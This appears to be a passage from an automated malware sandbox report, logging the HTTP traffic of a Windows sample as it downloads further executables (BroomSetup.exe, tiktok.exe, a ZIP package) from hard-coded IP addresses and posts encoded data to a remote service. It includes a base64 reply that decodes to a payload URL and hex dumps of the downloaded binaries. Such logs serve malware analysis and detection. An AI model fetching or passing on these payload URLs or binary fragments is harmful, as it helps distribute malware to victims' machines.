Apr 27, 2024 01:32:20.743670940 CEST	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 23:32:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 52 Connection: keep-alive Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38 Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	176.97.76.106	80	7436	C:\Users\user\Desktop\VucRf0jboS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 01:31:16.054105043 CEST	185	OUT	GET /1/Package.zip HTTP/1.1 Host: note.padd.cn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 01:31:16.248029947 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 23:15:55 GMT Content-Type: application/zip Content-Length: 3884863 Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT Connection: keep-alive ETag: "66289c8a-3b473f" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb [TRUNCATED] Data Ascii: PK?XIbunch.dat\]: "TN<wfX $;e)\|u]+UV~fRje@frVJ-#U=TE5Z&z'k%Je[5PB@.Gz[-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O:J%o`f+OW>SINCm6\|wQxkKoD:n4P>M_\|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF\|)@W6Z79d'`_6zr%a7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.\|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>Z5(]
Apr 27, 2024 01:31:16.248069048 CEST	1289	IN	Data Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
Apr 27, 2024 01:31:16.248126030 CEST	1289	IN	Data Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H\|Im8zn2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;,.\|j\[S
Apr 27, 2024 01:31:16.248166084 CEST	1289	IN	Data Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5 Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
Apr 27, 2024 01:31:16.248204947 CEST	1289	IN	Data Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a Data Ascii: ><:X4.`="+P!`p;KE.\|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_\|gYA#8
Apr 27, 2024 01:31:16.248244047 CEST	1289	IN	Data Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43 Data Ascii: 94SI6j<TNmokj>_P7!Wv}!K2@3Cs-<HIo5 Q0V?4v^i2D5v$ip^`RLK$.0 ^wS~W _h:JIEE;/?j8-
Apr 27, 2024 01:31:16.248282909 CEST	1289	IN	Data Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8 Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
Apr 27, 2024 01:31:16.248322964 CEST	1289	IN	Data Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
Apr 27, 2024 01:31:16.248361111 CEST	1289	IN	Data Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb Data Ascii: 2h\T^BTZP{@%{J.B\|n$=6icc6%Zxn1#]\|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
Apr 27, 2024 01:31:16.248398066 CEST	1289	IN	Data Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25 Data Ascii: p_%cBeg3-Ul #B\|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
Apr 27, 2024 01:31:16.442593098 CEST	1289	IN	Data Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be Data Ascii: MomvnhKB~`]2v=zim@M/Fa2\|dov>vk3#qLj[G?&e<kl9SA/vS/DMLaNjF[3);<g2<pUyru{){N8gk{>\|=r2WRBL]+=K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49738	185.172.128.228	80	7436	C:\Users\user\Desktop\VucRf0jboS.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 01:31:29.031114101 CEST	185	OUT	GET /BroomSetup.exe HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 01:31:29.201514959 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 23:31:29 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT ETag: "4a4030-613b1bf118700" Accept-Ranges: bytes Content-Length: 4866096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08\|7@B.rsrc<<@@JJ@@ [TRUNCATED]
Apr 27, 2024 01:31:29.201534033 CEST	1289	IN	Data Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
Apr 27, 2024 01:31:29.201550961 CEST	1289	IN	Data Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
Apr 27, 2024 01:31:29.201597929 CEST	1289	IN	Data Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
Apr 27, 2024 01:31:29.201617956 CEST	1289	IN	Data Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
Apr 27, 2024 01:31:29.201667070 CEST	1289	IN	Data Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
Apr 27, 2024 01:31:29.201716900 CEST	1289	IN	Data Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00 Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
Apr 27, 2024 01:31:29.201735973 CEST	1289	IN	Data Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10 Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
Apr 27, 2024 01:31:29.201771021 CEST	1289	IN	Data Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00 Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
Apr 27, 2024 01:31:29.201788902 CEST	1289	IN	Data Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
Apr 27, 2024 01:31:29.373740911 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65 Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	20.157.87.45	80	3704	C:\Users\user\AppData\Local\Temp\u5qk.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 01:32:01.434885025 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 27, 2024 01:32:01.635178089 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 27, 2024 01:32:01.842859983 CEST	469	IN	HTTP/1.1 200 OK cache-control: private content-length: 256 content-type: text/html; charset=utf-8 x-whom: Ioloweb9 date: Fri, 26 Apr 2024 23:32:01 GMT set-cookie: SERVERID=svc9; path=/ connection: close Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32 Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49757	20.157.87.45	80	3704	C:\Users\user\AppData\Local\Temp\u5qk.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 01:32:15.986619949 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 27, 2024 01:32:16.183234930 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 27, 2024 01:32:16.374836922 CEST	405	IN	HTTP/1.1 200 OK cache-control: private content-length: 192 content-type: text/html; charset=utf-8 x-whom: Ioloweb7 date: Fri, 26 Apr 2024 23:32:15 GMT set-cookie: SERVERID=svc7; path=/ connection: close Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53 Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49758	185.172.128.203	80	7516	C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 01:32:20.918322086 CEST	76	OUT	GET /tiktok.exe HTTP/1.1 Host: 185.172.128.203 Cache-Control: no-cache
Apr 27, 2024 01:32:21.090145111 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 23:32:21 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT ETag: "85400-616de2c892480" Accept-Ranges: bytes Content-Length: 545792 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B [TRUNCATED]
Apr 27, 2024 01:32:21.090199947 CEST	1289	IN	Data Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45 Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
Apr 27, 2024 01:32:21.090255976 CEST	1289	IN	Data Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58 Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
Apr 27, 2024 01:32:21.090336084 CEST	1289	IN	Data Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33 Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(\|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
